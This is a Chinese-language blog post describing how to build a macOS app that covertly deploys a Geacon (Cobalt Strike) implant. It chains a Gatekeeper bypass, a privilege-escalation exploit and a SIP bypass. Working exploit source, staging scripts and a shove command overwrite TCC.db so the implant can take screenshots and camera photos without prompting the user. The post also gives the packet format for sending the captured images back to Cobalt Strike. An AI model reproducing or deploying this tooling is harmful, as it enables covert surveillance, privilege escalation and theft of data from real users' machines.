

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="DingJiayu">
  <meta name="keywords" content="">
  
    <meta name="description" content="三个CVE CVE-2022-22616绕过GateKeeper修复版本macOS12.3   mkdir -p poc.app&#x2F;Contents&#x2F;MacOS echo &quot;#!&#x2F;bin&#x2F;bash&quot; &gt; poc.app&#x2F;Contents&#x2F;MacOS&#x2F;poc echo &quot;open -a Calculator&quot; &gt;&gt; poc.app&#x2F;Conten">
<meta property="og:type" content="article">
<meta property="og:title" content="geacon_macos">
<meta property="og:url" content="https://binpwn.github.io/2024/04/25/geacon-macos/index.html">
<meta property="og:site_name" content="binpwn&#39;s blog">
<meta property="og:description" content="三个CVE CVE-2022-22616绕过GateKeeper修复版本macOS12.3   mkdir -p poc.app&#x2F;Contents&#x2F;MacOS echo &quot;#!&#x2F;bin&#x2F;bash&quot; &gt; poc.app&#x2F;Contents&#x2F;MacOS&#x2F;poc echo &quot;open -a Calculator&quot; &gt;&gt; poc.app&#x2F;Conten">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://binpwn.github.io/.io//geacon_app_structure.png">
<meta property="og:image" content="https://binpwn.github.io/.io//geacon_func_structure.png">
<meta property="article:published_time" content="2024-04-24T16:24:03.000Z">
<meta property="article:modified_time" content="2024-04-24T16:52:19.536Z">
<meta property="article:author" content="DingJiayu">
<meta property="article:tag" content="MacOS">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://binpwn.github.io/.io//geacon_app_structure.png">
  
  
  
  <title>geacon_macos - binpwn&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"binpwn.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>binpwn&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="geacon_macos"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-04-25 00:24" pubdate>
          2024年4月25日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          18 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">geacon_macos</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="三个CVE"><a href="#三个CVE" class="headerlink" title="三个CVE"></a>三个CVE</h1><ul>
<li><p>CVE-2022-22616<br>绕过GateKeeper<br>修复版本macOS12.3</p>
<blockquote>
</blockquote>
<pre><code class="hljs">mkdir -p poc.app/Contents/MacOS
echo &quot;#!/bin/bash&quot; &gt; poc.app/Contents/MacOS/poc
echo &quot;open -a Calculator&quot; &gt;&gt; poc.app/Contents/MacOS/poc
chmod +x poc.app/Contents/MacOS/poc
zip -r poc.app.zip poc.app
gzip -c poc.app.zip &gt; poc.app.zip.gz
</code></pre>
</li>
<li><p>CVE-2022-22639<br>提权<br>修复版本macOS12.3</p>
<blockquote>
</blockquote>
<pre><code class="hljs">clang exploit.m -o /tmp/exploit -framework Foundation -fobjc-arc -fobjc-link-runtime /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/PrivateFrameworks/SoftwareUpdate.framework/Versions/A/SoftwareUpdate.tbd

解压 InstallAssistant.gz 到tmp文件夹

run /tmp/exploit
</code></pre>
</li>
<li><p>CVE-2022-26712<br>绕过SIP<br>修复版本macOS12.4</p>
<blockquote>
</blockquote>
<pre><code class="hljs">sudo /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove -X /tmp/crafted.db /Library/Application\ Support/com.apple.TCC/TCC.db
</code></pre>
</li>
</ul>
<h1 id="一-打包过程"><a href="#一-打包过程" class="headerlink" title="(一)打包过程"></a>(一)打包过程</h1><ol>
<li>首先是先将geacoon和相关代码进行编译</li>
<li>准备提权</li>
<li>准备替换TCC.db</li>
<li>将上面的步骤封装成一个app，并准备绕过gatekeeper</li>
</ol>
<ul>
<li>下面是整个App的构成，最终的效果是实现Geacon上线，并且能够正常执行Geacon中的相关功能；<br>我们的最终目的是想通过App让我们的Geacon上线，并且正常使用相关功能。所以在Geacon上线之前需要做一些前置工作（比如提权后绕过SIP操作TCC.db，先为我们的Geacon增加一下所需的权限），然后再启动Geacon。</li>
<li>主要构成</li>
<li>path<br>由于App可能会被放置到系统的各个位置，为了后面cp程序的正常执行，需要获取App当前所在的位置。因此，path程序做的事情就是获取当前App的位置，并且记录下来。</li>
<li>cp<br>该程序首先将提权程序elev执行所需的文件和环境构造好，然后启动提权程序</li>
<li>elev<br>该程序主要作用是以root权限执行一些命令，比如操作TCC.db的shove命令。效果就是在有root的权限基础上，进一步借助root权限执行shove，将系统原有的TCC.db替换掉，新的TCC.db中有我们Geacon程序所需的权限。</li>
<li>client<br>该程序就是Geacon程序，其中有截图、摄像头拍照功能，在截取屏幕内容和完成拍摄后是需要将图片回传至Cobalt Strike的。截图和调取摄像头都需要用户授予权限后才能使用，为了进一步隐蔽，上面通过借助提权程序和shove来为我们的Geacon程序提供预先设置好的权限。在前置工作完成的基础上，Geacon的功能是能够正常使用的，此时不会弹窗提示用户需要授权。这样Geacon程序是能够藏匿于目标系统中的。</li>
</ul>
<p><img src="/.io//geacon_app_structure.png" srcset="/img/loading.gif" lazyload alt="App构成"></p>
<p>下面这个结构就是自己添加的两个功能，一个是调取摄像头拍照，另一个是用于图片回传；</p>
<ul>
<li>关于图片回传的背景<br>之前Geacon里面的功能是面向Windows开发的，其中有些函数的用法并不适用MacOS，比如管道。在Windows下可以不用去了解图片的传输格式，但是在Mac中由于之前的功能不适用所以会导致传输图片失败，这样就必须去了解图片的发送格式，然后自己再手动构造一个包就行，这个用于构造传输图片的包的功能实现在ding模块里。</li>
</ul>
<p>这个源于一开始要实现截取屏幕内容并且回传，最初能截图但是图片却不能传回来，所以才进行了一个图片格式包的逆向。</p>
<ul>
<li>调取Macbook摄像头进行拍照<br>有了上面传输图片的基本功能后，可以进一步拓展。<br>当我们能调取摄像头进行拍照后，将其存为图片，继而可以将图片回传。</li>
</ul>
<p><img src="/.io//geacon_func_structure.png" srcset="/img/loading.gif" lazyload alt="功能构成"></p>
<h1 id="二-总体的大致实现流程"><a href="#二-总体的大致实现流程" class="headerlink" title="(二)总体的大致实现流程"></a>(二)总体的大致实现流程</h1><h2 id="App的可执行文件"><a href="#App的可执行文件" class="headerlink" title="App的可执行文件"></a>App的可执行文件</h2><p>下面代码做的事情：</p>
<ul>
<li>一个是将当前App路径记录下来，写进path文件里；</li>
<li>然后执行cp脚本</li>
<li>最后执行client程序</li>
</ul>
<blockquote>
</blockquote>
<pre><code class="hljs">#import &lt;Foundation/Foundation.h&gt;
int main(int argc, const char * argv[])&#123;

    NSBundle *myBundle = [NSBundle mainBundle];
    NSString *str = [myBundle bundlePath];//app path
    NSString *path2file = [str stringByAppendingString:@&quot;/Contents/Resources/path&quot;];//write path to file
    [str writeToFile:path2file atomically:TRUE encoding:NSUTF8StringEncoding error:nil];

    NSString *str1 = [str stringByAppendingString:@&quot;/Contents/Resources/cp&quot;];//bash script path
    NSLog(@&quot;%@&quot;,str);
    NSTask *task = [[NSTask alloc] init];
    NSArray *arguments = @[str];
    [task setLaunchPath:str1];
    [task setArguments:arguments];
    [task launch];//run script
    [task waitUntilExit];
    
    NSTask *client = [[NSTask alloc] init];
    [client setLaunchPath:@&quot;/tmp/client&quot;];
    [client launch];
    

    
    
    return 0;
&#125;
</code></pre>
<h2 id="cp脚本，用来准备执行提权程序"><a href="#cp脚本，用来准备执行提权程序" class="headerlink" title="cp脚本，用来准备执行提权程序"></a>cp脚本，用来准备执行提权程序</h2><p>下面的脚本是用来执行提权程序</p>
<blockquote>
</blockquote>
<pre><code class="hljs">#!/bin/bash
path1=$1
path2=&quot;/Contents/Resources/InstallAssistant.gz&quot;
path3=&quot;/Contents/Resources/elev&quot;
path4=&quot;/Contents/Resources/Applications&quot;
path5=&quot;/Contents/Resources/crafted.db&quot;

path7=&quot;/Contents/Resources/client&quot;
path=$&#123;path1&#125;$&#123;path2&#125;
echo $&#123;path&#125;

tar -xzvf $&#123;path&#125; -C $&#123;path1&#125;/Contents/Resources/
echo &quot;decompress over&quot;
mv -f $&#123;path1&#125;$&#123;path4&#125; /tmp/
cp -f $&#123;path1&#125;$&#123;path3&#125; /tmp/
cp -f $&#123;path1&#125;$&#123;path5&#125; /tmp/
cp -f $&#123;path1&#125;$&#123;path7&#125; /tmp/
echo &quot;mv over&quot;
/tmp/elev &amp;
sleep 1
</code></pre>
<h2 id="提权程序，可以将需要提权的代码执行放到这里执行"><a href="#提权程序，可以将需要提权的代码执行放到这里执行" class="headerlink" title="提权程序，可以将需要提权的代码执行放到这里执行"></a>提权程序，可以将需要提权的代码执行放到这里执行</h2><ul>
<li><p>提权程序的核心是在一个更新包的可执行程序中，可以是一个脚本；</p>
</li>
<li><p>下面做的是需要将执行的指令放到更新包的可执行程序中，以脚本的形式运行；</p>
</li>
<li><p>osinstallersetupd程序是以root的身份运行的，所以其中的指令也是以root的形式运行；</p>
</li>
<li><p>将需要root权限的指令写进去即可，比如下面是覆盖TCC.db</p>
<blockquote>
</blockquote>
<p>&#x2F;&#x2F;&#x2F;  clang exploit.m -o &#x2F;tmp&#x2F;exploit -framework Foundation -fobjc-arc -fobjc-link-runtime &#x2F;Applications&#x2F;Xcode.app&#x2F;Contents&#x2F;Developer&#x2F;Platforms&#x2F;MacOSX.platform&#x2F;Developer&#x2F;SDKs&#x2F;MacOSX.sdk&#x2F;System&#x2F;Library&#x2F;PrivateFrameworks&#x2F;SoftwareUpdate.framework&#x2F;Versions&#x2F;A&#x2F;SoftwareUpdate.tbd</p>
<p>#import &lt;Foundation&#x2F;Foundation.h&gt;</p>
<p>@protocol SUHelperDProtocol<br>&#x2F;&#x2F; some protocol methods<br>@end</p>
<p>@interface SUHelperProxy : NSObject <SUHelperDProtocol><br>{<br>unsigned int _suhelperd_port;<br>unsigned int _client_port;<br>long long _currentRights;<br>NSObject<OS_dispatch_queue> *_q;<br>NSObject<OS_dispatch_source> *clientPortDeadChecker;<br>long long _recentRights;<br>}</OS_dispatch_source></OS_dispatch_queue></SUHelperDProtocol></p>
<ul>
<li>(id)sharedHelperProxy;<br>@property long long recentRights; &#x2F;&#x2F; @synthesize recentRights&#x3D;_recentRights;</li>
</ul>
<ul>
<li>(void)authorizeWithEmptyAuthorizationForRights:(long long)arg1;</li>
<li>(BOOL) prepareInstallAssistantWithPath:(NSString *)arg1;</li>
<li>(id) installAssistantPreparationStatus;</li>
</ul>
<p>@end</p>
<p>int main(int argc, const char * argv[]) {</p>
<pre><code class="hljs">NSString *modifyFile = @&quot;/tmp/Applications/Install macOS Monterey beta.app/Contents/Frameworks/OSInstallerSetup.framework/Resources/osinstallersetupd&quot;;
NSString *installAppPath = @&quot;/tmp/Applications/Install macOS Monterey beta.app&quot;;
NSString *instr1 = @&quot;#!/bin/bash\nwhoami &amp;&gt; /Library/test_root\n&quot;;//Test root
NSString *instr2 = @&quot;/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove -X /tmp/crafted.db /Library/Application\\ Support/com.apple.TCC/TCC.db\n&quot;;//change tcc.db of system

NSString *instr = [instr1 stringByAppendingString:instr2];//instr1 + instr2
[instr writeToFile:modifyFile atomically:TRUE encoding:NSUTF8StringEncoding error:nil];

// fire the hole
NSLog(@&quot;all ready, we can go go go!&quot;);

SUHelperProxy *helper = [SUHelperProxy sharedHelperProxy];
[helper authorizeWithEmptyAuthorizationForRights:4];

id status = [helper installAssistantPreparationStatus];
NSLog(@&quot;installAssistantPreparationStatus:%@&quot;, status);
// will hang inside, waiting for XPC response
[helper prepareInstallAssistantWithPath:installAppPath];

return 0;
</code></pre>
<p>}</p>
</li>
</ul>
<h2 id="client程序就是我们编译好的geacon"><a href="#client程序就是我们编译好的geacon" class="headerlink" title="client程序就是我们编译好的geacon"></a>client程序就是我们编译好的geacon</h2><ul>
<li>前面做的工作是为了client能够正常运行</li>
<li>当能够正常运行client时，该mac机器就能够正常上线</li>
<li>这部分主要就是除了geacon的基本功能，还额外实现了截图和打开摄像头拍照，并且可以将图片回传至CobaltStrike上面。</li>
</ul>
<h1 id="三-geacon和自拓展功能"><a href="#三-geacon和自拓展功能" class="headerlink" title="(三)geacon和自拓展功能"></a>(三)geacon和自拓展功能</h1><h2 id="geacon实现"><a href="#geacon实现" class="headerlink" title="geacon实现"></a>geacon实现</h2><p>这部分待补【目前放在网盘里】</p>
<h2 id="截图功能"><a href="#截图功能" class="headerlink" title="截图功能"></a>截图功能</h2><p>这部分工作要依赖上面提到的提权和绕过SIP。</p>
<ul>
<li><p>提权：是为了以root用户的身份去执行一些命令</p>
</li>
<li><p>绕过SIP：上面提到在特定系统版本范围内，shove命令可以直接操作TCC.db，但是这是需要root权限，所以配合提权就可以替换掉TCC.db文件</p>
</li>
<li><p>TCC.db：在Mac中应用可能会需要各种权限，在使用这些权限之前它需要先向系统申请授予权限，得到权限后才能进一步使用对应的功能。而记录每个程序权限控制就记录在TCC.db中</p>
</li>
</ul>
<p>这里我们是直接使用Mac自带的截图命令来截取当前的屏幕内容，如果程序没有被授予截屏权限将不能截取到屏幕的内容，而仅能截取到屏幕的背景，所以我们想要截取屏幕的内容需要先授予截屏权限。授予权限我们是通过更改TCC.db中的数据来更改权限的，是借助提权和绕过SIP两个漏洞来进行的，下面的摄像头功能同样是如此。</p>
<h2 id="关于图片回传"><a href="#关于图片回传" class="headerlink" title="关于图片回传"></a>关于图片回传</h2><p>这部分是将图片回传至CobaltStrike上，之前在Windows端的图片回传是通过管道获取数据的，在Mac上如果回传的格式不对CobaltStrike是无法正确解析的，所以下面Mac上的图片回传是通过调试Windows端的geacon来进一步获取回传的格式。</p>
<p>回传的格式如下:<br>图片内容长度(4Byte) + 图片内容 + id(4Byte) + 窗口名字的长度(4Byte) + 窗口名字 + 用户名字长度(4Byte) + 用户名字</p>
<p>将图片打包成正确的格式，我实现在ding.mm文件中</p>
<h2 id="摄像头拍照"><a href="#摄像头拍照" class="headerlink" title="摄像头拍照"></a>摄像头拍照</h2><p>摄像头拍照功能是通过包含bmain.h文件来调用的，打开摄像头并拍照放在一个单独的模块进行实现的。</p>
<p>该功能通过三个模块实现的：<br>VideoCapturer<br>MyDelegate<br>bmain</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%A0%94%E7%A9%B6%E7%94%9F/" class="category-chain-item">研究生</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/MacOS/" class="print-no-link">#MacOS</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>geacon_macos</div>
      <div>https://binpwn.github.io/2024/04/25/geacon-macos/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>DingJiayu</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年4月25日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2066/04/25/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" title="博客搭建">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">博客搭建</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://github.com/dkjiayu" target="_blank" rel="nofollow noopener"><span>DJY</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/binpwn" target="_blank" rel="nofollow noopener"><span>ZJL</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
